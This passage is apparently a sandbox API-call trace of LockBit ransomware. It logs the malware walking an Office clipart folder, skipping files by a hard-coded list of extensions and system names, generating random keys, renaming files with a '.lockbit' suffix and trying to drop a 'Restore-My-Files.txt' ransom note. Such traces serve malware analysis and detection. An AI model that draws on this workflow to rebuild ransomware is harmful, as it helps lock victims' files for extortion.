(lpString1="bootsect.bak", lpString2="PE02263_.WMF") returned -1 [0167.423] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02263_.WMF") returned -1 [0167.423] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02263_.WMF") returned 1 [0167.423] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02263_.WMF") returned -1 [0167.423] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.423] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02263_.WMF") returned=".WMF" [0167.423] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.423] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.424] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.425] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02263_.WMF.lockbit") returned 72 [0167.425] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02263_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02263_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.426] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.426] malloc (_Size=0x40068) returned 0x3df0008 [0167.426] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33358) returned 1 [0167.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.427] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02263_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02263_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.432] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.432] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.434] free (_Block=0x1fa2ed8) [0167.434] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02263_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.434] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.434] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.434] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa753f100, ftCreationTime.dwHighDateTime=0x1bd4b13, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa753f100, ftLastWriteTime.dwHighDateTime=0x1bd4b13, nFileSizeHigh=0x0, nFileSizeLow=0x62b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02265_.WMF", cAlternateFileName="")) returned 1 [0167.434] lstrcmpiW (lpString1=".", lpString2="PE02265_.WMF") returned -1 [0167.434] lstrcmpiW (lpString1="..", lpString2="PE02265_.WMF") returned -1 [0167.434] PathFindExtensionW (pszPath="PE02265_.WMF") returned=".WMF" [0167.434] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.434] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.434] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.434] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.434] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.435] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.436] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.436] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02265_.WMF") returned 1 [0167.437] lstrcmpiW (lpString1="ntldr", lpString2="PE02265_.WMF") returned -1 [0167.437] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02265_.WMF") returned -1 [0167.437] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02265_.WMF") returned -1 [0167.437] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02265_.WMF") returned -1 [0167.437] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02265_.WMF") returned 1 [0167.437] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02265_.WMF") returned -1 [0167.437] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.437] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02265_.WMF") returned=".WMF" [0167.437] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.437] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.437] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.438] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.438] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02265_.WMF.lockbit") returned 72 [0167.439] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02265_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.440] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.440] malloc (_Size=0x40068) returned 0x3f70048 [0167.440] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=25266) returned 1 [0167.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0167.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.441] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0167.441] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0167.447] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02265_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02265_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.447] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.447] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.449] free (_Block=0x1fa2ed8) [0167.449] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02265_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.449] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.449] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3f02900, ftCreationTime.dwHighDateTime=0x1bd4b13, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc3f02900, ftLastWriteTime.dwHighDateTime=0x1bd4b13, nFileSizeHigh=0x0, nFileSizeLow=0x78e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02267_.WMF", cAlternateFileName="")) returned 1 [0167.449] lstrcmpiW (lpString1=".", lpString2="PE02267_.WMF") returned -1 [0167.449] lstrcmpiW (lpString1="..", lpString2="PE02267_.WMF") returned -1 [0167.449] PathFindExtensionW (pszPath="PE02267_.WMF") returned=".WMF" [0167.449] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.449] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.449] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.449] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.449] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.449] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.449] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.450] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.450] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.451] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02267_.WMF") returned 1 [0167.451] lstrcmpiW (lpString1="ntldr", lpString2="PE02267_.WMF") returned -1 [0167.451] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02267_.WMF") returned -1 [0167.451] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02267_.WMF") returned -1 [0167.451] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02267_.WMF") returned -1 [0167.452] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02267_.WMF") returned 1 [0167.452] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02267_.WMF") returned -1 [0167.452] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.452] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02267_.WMF") returned=".WMF" [0167.452] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.452] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.452] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.453] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.453] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02267_.WMF.lockbit") returned 72 [0167.453] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02267_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.463] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.463] malloc (_Size=0x40068) returned 0x3df0008 [0167.464] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=30944) returned 1 [0167.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.465] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.467] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02267_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02267_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.467] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.467] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.468] free (_Block=0x1fa2ed8) [0167.468] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02267_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.468] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.468] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.468] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fe53000, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7fe53000, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, 